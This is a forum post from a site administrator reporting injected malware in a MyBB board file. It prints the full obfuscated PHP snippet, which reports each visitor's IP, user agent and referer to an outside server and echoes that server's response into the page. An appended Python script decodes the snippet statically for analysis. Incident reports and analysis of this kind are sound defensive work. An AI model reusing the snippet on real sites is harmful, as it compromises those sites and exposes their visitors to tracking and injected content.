2011-10-12, 10:24 AM
Today I got bulk error emails from my board
saying Your copy of ****** (http://www.*****.com) has experienced an error. Details of the error include:
---
Type: 2
File: archive/index.php (Line no. 506)
Message
file_get_contents(http://91.196.216.30/bt.php?ip=173.245.49.72&host=www.seminarprojects.com&uri=%2Farchive%2Findex.php%2Fforum-22.html&ua=mozilla%2F5.0+%28windows%3B+u%3B+windows+nt+6.1%3B+en-us%3B+rv%3A1.9.1.5%29+gecko%2F20091102+firefox%2F3.5.5&ref=http%3A%2F%2Fwww.seminarprojects.com%2Farchive%2Findex.php) [<a href='function.file-get-contents'>function.file-get-contents</a>]: failed to open stream: HTTP request failed! HTTP/1.1 502 Bad Gateway
And in the same file I found a suspicious script:
<?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref; $tmp = file_get_contents($url); echo $tmp; ?>
I found there are a lot of errors like this in Google:
http://www.google.co.in/search?gcx=c&sou...196.216.30
I reset the cPanel and MySQL passwords since I feel it's like script injection?
Can anyone tell me more about this?
I think someone has injected a malicious script in a PHP file,
and there is a similar page at http://community.mybb.com/thread-105586.html
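
Added example, not part of the original post: a static decoder for the obfuscated head of the snippet above, written in Python so that nothing from the sample is ever passed to eval(). The function name decode_dropper and the SAMPLE constant are assumptions made for this example; the encoded strings are copied from the post.

```python
import base64
import re

# Obfuscated head of the injected snippet, copied from the post above.
SAMPLE = (
    "<?php $_F=__FILE__;"
    "$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';"
    "eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcx"
    "MjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18n"
    "LCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));"
)

B64 = r"[A-Za-z0-9+/=]+"


def decode_dropper(php_source: str) -> dict:
    """Unwrap both layers by text processing only; the sample is never run."""
    payload = re.search(r"\$_X='(" + B64 + r")'", php_source)
    loader = re.search(r"eval\(base64_decode\('(" + B64 + r")'\)\)", php_source)
    if not payload or not loader:
        raise ValueError("input does not use this obfuscation scheme")

    # Layer 1: the eval()'d string is plain base64 and holds the loader code.
    loader_src = base64.b64decode(loader.group(1)).decode("latin-1")

    # The loader names the two strtr() alphabets; read them from the decoded
    # text instead of hard-coding them, so variants with other tables decode.
    tables = re.search(r"strtr\(\$_X,'([^']*)','([^']*)'\)", loader_src)
    if not tables or len(tables.group(1)) != len(tables.group(2)):
        raise ValueError("strtr() tables missing or of unequal length")

    # Layer 2: base64, then a character-for-character substitution.
    # str.translate maps all characters at once, like three-argument strtr().
    stage2 = base64.b64decode(payload.group(1)).decode("latin-1")
    stage2 = stage2.translate(str.maketrans(tables.group(1), tables.group(2)))

    urls = re.findall(r"https?://[^\s'\"]+", stage2)
    return {"loader": loader_src, "stage2": stage2, "urls": urls}


if __name__ == "__main__":
    result = decode_dropper(SAMPLE)
    print("loader :", result["loader"])
    print("stage 2:", result["stage2"])
    print("URLs   :", result["urls"])
```

The decoded second stage only assigns $url, and the address it yields is the same host that appears in the file_get_contents() error mail, so the visible tail of the snippet is what sends each visitor's IP, host, URI, user agent and referer there and echoes the response into the page.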